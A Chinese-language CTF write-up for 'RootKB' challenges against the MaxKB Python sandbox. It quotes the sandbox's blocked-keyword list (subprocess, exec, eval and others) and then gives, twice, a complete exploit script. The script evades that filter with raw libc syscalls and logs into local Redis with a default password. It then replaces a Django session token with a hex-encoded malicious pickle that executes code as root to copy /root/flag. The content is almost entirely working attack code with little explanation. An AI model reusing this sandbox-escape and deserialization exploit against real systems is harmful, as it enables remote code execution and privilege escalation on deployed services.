RootKB
MAXKB_SANDBOX_PYTHON_BANNED_HOSTS="127.0.0.1,localhost,host.docker.internal,maxkb,pgsql,redis"
MAXKB_SANDBOX_PYTHON_BANNED_KEYWORDS="subprocess.,system(,exec(,execve(,pty.,eval(,compile(,shutil.,input(,__import__"
我们看到了以上的黑名单,发现想要通过socket实现waf绕过不可取,但是并没有封禁我们使用syscall进行底层绕过,然后后面的步骤就是连上redis,然后登录上之后改token利用Django来写flag到一个文件夹下,然后再获取flag,所有过程全部集中到一个脚本中,需要使用两次
def pwn():
import socket, ctypes, struct, os
libc = ctypes.CDLL(None, use_errno=True)
SYS_SOCKET = 41
SYS_CONNECT = 42
AF_INET = socket.AF_INET
SOCK_STREAM = socket.SOCK_STREAM
# -------- syscall 版 connect,复用你之前成功的写法 --------
def sys_connect(host, port):
fd = libc.syscall(SYS_SOCKET, AF_INET, SOCK_STREAM, 0)
if fd < 0:
return None, {"step": "socket", "errno": ctypes.get_errno()}
sin_port = socket.htons(port)
sin_addr = socket.inet_aton(host)
packed = struct.pack("HH4s8x", AF_INET, sin_port, sin_addr)
addr = ctypes.create_string_buffer(packed, len(packed))
ret = libc.syscall(SYS_CONNECT, fd, addr, ctypes.c_uint32(len(packed)))
if ret != 0:
err = ctypes.get_errno()
os.close(fd)
return None, {"step": "connect", "errno": err}
s = socket.fromfd(fd, AF_INET, SOCK_STREAM)
os.close(fd)
s.settimeout(3.0)
return s, None
# -------- Redis 命令:每次建立新连接 + AUTH --------
def redis_cmd(args):
s, err = sys_connect("127.0.0.1", 6379)
if s is None:
return None, err
try:
def enc(parts):
buf = b"*" + str(len(parts)).encode() + b"\r\n"
for p in parts:
if isinstance(p, str):
b = p.encode()
else:
b = p
buf += b"$" + str(len(b)).encode() + b"\r\n" + b + b"\r\n"
return buf
# 先 AUTH(官方镜像默认)
s.sendall(enc(["AUTH", "Password123@redis"]))
try:
_ = s.recv(1024)
except Exception:
pass
# 再发真正的命令
s.sendall(enc(args))
data = b""
while True:
try:
chunk = s.recv(4096)
except Exception:
break
if not chunk:
break
data += chunk
if len(data) > 65536:
break
return data, None
finally:
try:
s.close()
except Exception:
pass
# 1. 找 :TOKEN:* 这个 key
resp, err = redis_cmd(["KEYS", ":TOKEN*"])
if resp is None:
return {"ok": False, "stage": "keys", "error": err}
txt = resp.decode("latin1", "ignore")
pos = txt.find(":TOKEN:")
if pos == -1:
return {"ok": False, "stage": "no_token_key", "raw": txt[:200]}
end = txt.find("\r\n", pos)
if end == -1:
return {"ok": False, "stage": "parse_key", "raw": txt[:200]}
token_key = txt[pos:end]
# key 类似 :TOKEN:<token_str>,取后半段当真正 token
try:
token_str = token_key.split(":TOKEN:", 1)[1]
except Exception:
return {"ok": False, "stage": "split_token", "token_key": token_key}
# 2. 用恶意 pickle 覆盖这个 key 的 value
# 载荷逻辑(在 Django / root 进程里反序列化执行):
# data = open("/root/flag","r").read()
# open("/opt/maxkb-app/sandbox/pwned_flag","w").write(data)
hex_payload = (
"800595a0000000000000008c086275696c74696e73948c04657865639493948c"
"84696d706f7274206275696c74696e732c6f730a64617461203d206275696c74"
"696e732e6f70656e28222f726f6f742f666c6167222c227222292e7265616428"
"290a6275696c74696e732e6f70656e28222f6f70742f6d61786b622d6170702f"
"73616e64626f782f70776e65645f666c6167222c227722292e77726974652864"
"617461290a94859452942e"
)
payload_bytes = bytes.fromhex(hex_payload)
set_resp, err2 = redis_cmd(["SET", token_key, payload_bytes])
if set_resp is None:
return {"ok": False, "stage": "set_token", "error": err2}
set_text = set_resp.decode("latin1", "ignore")[:100]
# 3. syscall 打 8080,用 token 触发 Django 反序列化
def http_trigger(path, header_line):
s, err3 = sys_connect("127.0.0.1", 8080)
if s is None:
return {"path": path, "header": header_line.split(":", 1)[0], "error": err3}
try:
req = (
"GET {p} HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"{h}\r\n"
"Connection: close\r\n\r\n"
).format(p=path, h=header_line)
s.sendall(req.encode("ascii", "ignore"))
data = b""
while True:
try:
chunk = s.recv(4096)
except Exception:
break
if not chunk:
break
data += chunk
if len(data) > 8192:
break
line = data.split(b"\r\n", 1)[0].decode("latin1", "ignore")
parts = line.split(" ")
code = None
if len(parts) >= 2 and parts[1].isdigit():
code = int(parts[1])
return {"path": path, "header": header_line.split(":", 1)[0], "status": code}
finally:
try:
s.close()
except Exception:
pass
headers = [
"Authorization: " + token_str,
"Authorization: Token " + token_str,
"Cookie: token=" + token_str,
"Cookie: auth=" + token_str,
]
http_results = []
for pth in ["/admin/", "/admin/api/workspace/current_user"]:
for h in headers:
http_results.append(http_trigger(pth, h))
# 4. 读 root 进程写出来的 flag 文件
flag_path = "/opt/maxkb-app/sandbox/pwned_flag"
if os.path.exists(flag_path):
try:
with open(flag_path, "r") as f:
flag = f.read().strip()
except Exception as e:
return {
"ok": False,
"stage": "read_flag_error",
"flag_path": flag_path,
"error": repr(e),
"token_key": token_key,
"token_str_head": token_str[:64],
"set_reply": set_text,
"http": http_results,
}
return {
"ok": True,
"stage": "done",
"flag": flag,
"token_key": token_key,
"token_str_head": token_str[:64],
"set_reply": set_text,
"http": http_results,
}
else:
return {
"ok": False,
"stage": "flag_not_written",
"flag_path": flag_path,
"token_key": token_key,
"token_str_head": token_str[:64],
"set_reply": set_text,
"http": http_results,
}
RootKB—
同上
def pwn():
import socket, ctypes, struct, os
libc = ctypes.CDLL(None, use_errno=True)
SYS_SOCKET = 41
SYS_CONNECT = 42
AF_INET = socket.AF_INET
SOCK_STREAM = socket.SOCK_STREAM
# -------- syscall 版 connect,复用你之前成功的写法 --------
def sys_connect(host, port):
fd = libc.syscall(SYS_SOCKET, AF_INET, SOCK_STREAM, 0)
if fd < 0:
return None, {"step": "socket", "errno": ctypes.get_errno()}
sin_port = socket.htons(port)
sin_addr = socket.inet_aton(host)
packed = struct.pack("HH4s8x", AF_INET, sin_port, sin_addr)
addr = ctypes.create_string_buffer(packed, len(packed))
ret = libc.syscall(SYS_CONNECT, fd, addr, ctypes.c_uint32(len(packed)))
if ret != 0:
err = ctypes.get_errno()
os.close(fd)
return None, {"step": "connect", "errno": err}
s = socket.fromfd(fd, AF_INET, SOCK_STREAM)
os.close(fd)
s.settimeout(3.0)
return s, None
# -------- Redis 命令:每次建立新连接 + AUTH --------
def redis_cmd(args):
s, err = sys_connect("127.0.0.1", 6379)
if s is None:
return None, err
try:
def enc(parts):
buf = b"*" + str(len(parts)).encode() + b"\r\n"
for p in parts:
if isinstance(p, str):
b = p.encode()
else:
b = p
buf += b"$" + str(len(b)).encode() + b"\r\n" + b + b"\r\n"
return buf
# 先 AUTH(官方镜像默认)
s.sendall(enc(["AUTH", "Password123@redis"]))
try:
_ = s.recv(1024)
except Exception:
pass
# 再发真正的命令
s.sendall(enc(args))
data = b""
while True:
try:
chunk = s.recv(4096)
except Exception:
break
if not chunk:
break
data += chunk
if len(data) > 65536:
break
return data, None
finally:
try:
s.close()
except Exception:
pass
# 1. 找 :TOKEN:* 这个 key
resp, err = redis_cmd(["KEYS", ":TOKEN*"])
if resp is None:
return {"ok": False, "stage": "keys", "error": err}
txt = resp.decode("latin1", "ignore")
pos = txt.find(":TOKEN:")
if pos == -1:
return {"ok": False, "stage": "no_token_key", "raw": txt[:200]}
end = txt.find("\r\n", pos)
if end == -1:
return {"ok": False, "stage": "parse_key", "raw": txt[:200]}
token_key = txt[pos:end]
# key 类似 :TOKEN:<token_str>,取后半段当真正 token
try:
token_str = token_key.split(":TOKEN:", 1)[1]
except Exception:
return {"ok": False, "stage": "split_token", "token_key": token_key}
# 2. 用恶意 pickle 覆盖这个 key 的 value
# 载荷逻辑(在 Django / root 进程里反序列化执行):
# data = open("/root/flag","r").read()
# open("/opt/maxkb-app/sandbox/pwned_flag","w").write(data)
hex_payload = (
"800595a0000000000000008c086275696c74696e73948c04657865639493948c"
"84696d706f7274206275696c74696e732c6f730a64617461203d206275696c74"
"696e732e6f70656e28222f726f6f742f666c6167222c227222292e7265616428"
"290a6275696c74696e732e6f70656e28222f6f70742f6d61786b622d6170702f"
"73616e64626f782f70776e65645f666c6167222c227722292e77726974652864"
"617461290a94859452942e"
)
payload_bytes = bytes.fromhex(hex_payload)
set_resp, err2 = redis_cmd(["SET", token_key, payload_bytes])
if set_resp is None:
return {"ok": False, "stage": "set_token", "error": err2}
set_text = set_resp.decode("latin1", "ignore")[:100]
# 3. syscall 打 8080,用 token 触发 Django 反序列化
def http_trigger(path, header_line):
s, err3 = sys_connect("127.0.0.1", 8080)
if s is None:
return {"path": path, "header": header_line.split(":", 1)[0], "error": err3}
try:
req = (
"GET {p} HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"{h}\r\n"
"Connection: close\r\n\r\n"
).format(p=path, h=header_line)
s.sendall(req.encode("ascii", "ignore"))
data = b""
while True:
try:
chunk = s.recv(4096)
except Exception:
break
if not chunk:
break
data += chunk
if len(data) > 8192:
break
line = data.split(b"\r\n", 1)[0].decode("latin1", "ignore")
parts = line.split(" ")
code = None
if len(parts) >= 2 and parts[1].isdigit():
code = int(parts[1])
return {"path": path, "header": header_line.split(":", 1)[0], "status": code}
finally:
try:
s.close()
except Exception:
pass
headers = [
"Authorization: " + token_str,
"Authorization: Token " + token_str,
"Cookie: token=" + token_str,
"Cookie: auth=" + token_str,
]
http_results = []
for pth in ["/admin/", "/admin/api/workspace/current_user"]:
for h in headers:
http_results.append(http_trigger(pth, h))
# 4. 读 root 进程写出来的 flag 文件
flag_path = "/opt/maxkb-app/sandbox/pwned_flag"
if os.path.exists(flag_path):
try:
with open(flag_path, "r") as f:
flag = f.read().strip()
except Exception as e:
return {
"ok": False,
"stage": "read_flag_error",
"flag_path": flag_path,
"error": repr(e),
"token_key": token_key,
"token_str_head": token_str[:64],
"set_reply": set_text,
"http": http_results,
}
return {
"ok": True,
"stage": "done",
"flag": flag,
"token_key": token_key,
"token_str_head": token_str[:64],
"set_reply": set_text,
"http": http_results,
}
else:
return {
"ok": False,
"stage": "flag_not_written",
"flag_path": flag_path,
"token_key": token_key,
"token_str_head": token_str[:64],
"set_reply": set_text,
"http": http_results,
}